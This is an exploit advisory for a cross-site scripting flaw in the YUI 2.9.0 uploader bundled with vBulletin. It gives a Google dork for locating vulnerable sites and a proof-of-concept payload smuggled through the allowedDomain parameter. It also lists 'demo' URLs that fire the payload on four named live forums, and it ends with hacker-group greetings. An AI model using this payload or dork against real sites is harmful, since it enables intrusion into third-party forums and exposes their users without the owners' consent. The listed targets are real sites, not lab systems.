vBulletin YUI version 2.9.0 suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
70b04ec197f8e63c02b7663b1a4b2d9d18521f1c0c32ac2e1970802272e3fc06
[+] Author: TUNISIAN CYBER
[+] Exploit Title: vBulletin YUI 2.9.0 Cross Site Scripting vulnerability
[+] Date: 09-01-2014
[+] Category: WebApp
[+] Google Dork: :inurl:"clientscript/yui/uploader/assets/"
[+] Tested on: KaliLinux
[+} Friend's blog: www.na3il.com
########################################################################################
+Description:
YUI is a free, open source JavaScript and CSS library for building richly interactive web applications.
Used by vBulletin.
+Exploit:
YUI suffers from an xss vulnerability.
+P.O.C:
127.0.0.1/[PATH]/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
Demo:
http://fansfoot.com/forum/core/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
http://www.liveworkshop.com/forums/core/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
http://www.mjjcommunity.com/forum/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
http://www.wivesbehindthebadge.org/forums/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
Patch:
Upgarde to 3.X Version.
./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################